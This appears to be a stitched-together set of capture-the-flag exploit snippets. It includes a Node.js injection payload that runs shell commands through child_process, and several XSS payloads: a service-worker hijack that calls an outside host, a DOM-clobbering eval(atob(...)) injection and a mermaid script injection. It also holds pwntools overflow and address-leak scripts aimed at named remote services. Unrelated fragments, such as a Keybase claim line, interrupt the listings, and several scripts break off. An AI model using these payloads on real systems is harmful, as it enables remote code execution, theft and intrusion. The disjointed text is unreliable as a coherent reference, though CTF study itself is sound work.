'+constructor.constructor("return process")().mainModule.require("child_process").execSync('cat * | grep CSR')+' CSR{r363x_15_fun_r363x_15_l0v3}
'+constructor.constructor("return process")().mainModule.require("child_process").execSync('cat * | grep CSR')+' CSR{r363x_15_fun_r363x_15_l0v3}
| <iframe srcdoc="<form action="https://amazingnotes.asisctf.com:444/" method="POST" id=x> | |
| <input name=ext value=es> | |
| <textarea name=note> | |
| self.addEventListener("fetch", function(event) { | |
| if(event.request.url.indexOf("flag") != -1) | |
| return; | |
| event.respondWith(new Response(` | |
| <img src=//p6.is/givemeflag> | |
| <script> |
| <a id=context><iframe id=context name=apiPublicKey href="x"></iframe><iframe id=context name=auth href="x" b=y></iframe><iframe id=context name=disqusUrl href="x"></iframe></a> | |
| <div id="account-nav"></div><div id="anon-account-nav-tmpl">${eval(atob(`YWxlcnQob3JpZ2luKQ`))}</div> | |
| * repeat below if you want to improve the reliability | |
| ```mermaid | |
| graph LR; | |
| A-->B; | |
| click B callback "<script src=https://a.disquscdn.com/1608164631/build/js/abadd50d331d.js></script><script src=https://a.disquscdn.com/1608164631/js/src/global.js></script>" | |
| ``` |
| # pwntools client for a remote CTF service. This is a listing preview: the script stops after the payload is built, and nothing here sends it. | |
| from pwn import * | |
| # Commented-out alternative: run the local ./game binary instead of connecting to the remote service. | |
| # p = process('./game') | |
| p = remote('cop.ichsa.ctf.today', 8011) | |
| # NOTE(review): indentation was lost in this listing, so which of the following lines form the loop body cannot be determined from here. | |
| for i in range(0x90): | |
| # Wait for the menu prompt and answer with option '2'. | |
| p.sendlineafter('Please chose an option', '2') | |
| p.sendlineafter('Please chose an option', '2') | |
| # Six filler bytes, then the value 0x401813 packed as a 64-bit word and repeated 16 times. | |
| # NOTE(review): presumably 0x401813 is an address inside the target binary; confirm against ./game. | |
| payload = b'aaaaaa' + p64(0x401813)*16 |
| # Connects to the remote service, sends one line made of 150 bytes of value 0x01, then hands the session to the operator. | |
| from pwn import * | |
| p = remote('20.42.99.115', 3000) | |
| # NOTE(review): 150 is presumably larger than the buffer the service reads into; the target is not shown here, so confirm. | |
| # A service that bounds its reads to the destination buffer size would not be affected by input of this length. | |
| payload = b'\1'*150 | |
| p.sendline(payload) | |
| # Switch to interactive mode so the operator can read the service's reply. | |
| p.interactive() |
| # pwntools client for a remote CTF service. This is a listing preview: the script continues past the last line shown. | |
| from pwn import * | |
| # Log every byte sent and received. | |
| context.log_level = 'debug' | |
| # Commented-out alternative: run ./vuln locally under qemu-aarch64 (-L . sets the library prefix, -g 1234 waits for a debugger on that port). | |
| # p = process('./qemu-aarch64 -L . -g 1234 ./vuln'.split(' ')) | |
| p = remote('pwn.zh3r0.cf', 1111) | |
| # Parse the local copy of the target binary; how e is used is not visible in this preview. | |
| e = ELF('./vuln') | |
| # Send eight 'a' characters without a newline, then consume output up to and including their echo. | |
| # NOTE(review): presumably the bytes the service prints after the echo are read next; that part is not shown. | |
| p.send('a'*8) | |
| p.recvuntil('a'*8) |
I hereby claim:
To claim this, I am signing this object:
| # Setup for a pwntools script that also calls into a local libc through ctypes. This is a listing preview: only the setup is shown. | |
| from pwn import * | |
| from ctypes import * | |
| from time import sleep | |
| # Log every byte sent and received. | |
| context.log_level = 'debug' | |
| # Load ./libc.so and seed its rand() generator with the current time as returned by that libc's time(0). | |
| # NOTE(review): presumably this mirrors a target that calls srand(time(0)); the target is not shown, so confirm. | |
| # A time-seeded rand() sequence can be reproduced by anyone who knows the approximate start time, so it should not back security decisions. | |
| rlibc = CDLL('./libc.so') | |
| rlibc.srand(rlibc.time(0)) | |
| # Commented-out: start the local ./chall binary. | |
| # p = process('./chall') |
| # Connects to the remote service and sends one line: zero padding followed by a fixed 32-bit value. | |
| from pwn import * | |
| # Commented-out alternative: run the local ./ap-abcs binary instead of the remote service. | |
| # p = process('./ap-abcs') | |
| p = remote('bin.bcactf.com', 49154) | |
| # 0x50 - 0x4 = 76 zero bytes of padding. | |
| payload = b'\0'*(0x50-0x4) | |
| # Append 0x73434241 as a 32-bit word; with pwntools' default little-endian packing these are the bytes "ABCs". | |
| # NOTE(review): presumably the padding reaches a variable the program compares against this value; confirm against the binary. | |
| payload += p32(0x73434241) | |
| p.sendline(payload) |
| # Reads a hexadecimal value printed by the remote service and derives a base address from it. This is a listing preview: the script continues past the last line shown. | |
| from pwn import * | |
| # Commented-out alternative: run the local ./chall binary instead of the remote service. | |
| # p = process('./chall') | |
| p = remote('35.224.135.84', 1001) | |
| # Wait for the '>' prompt and choose option '1'. | |
| p.sendlineafter('>', '1') | |
| # Parse bytes 40 up to the last three of the reply line as a base-16 integer. | |
| # NOTE(review): the names suggest the service prints a code address of a position-independent binary; a service that prints raw pointers discloses its memory layout. Confirm against the binary. | |
| pie_leak = int(p.recvline()[40:-3], 16) | |
| # Subtract the fixed offset 0x1390 to obtain what the script treats as the load base. | |
| pie_base = pie_leak - 0x1390 | |
| print(hex(pie_leak)) |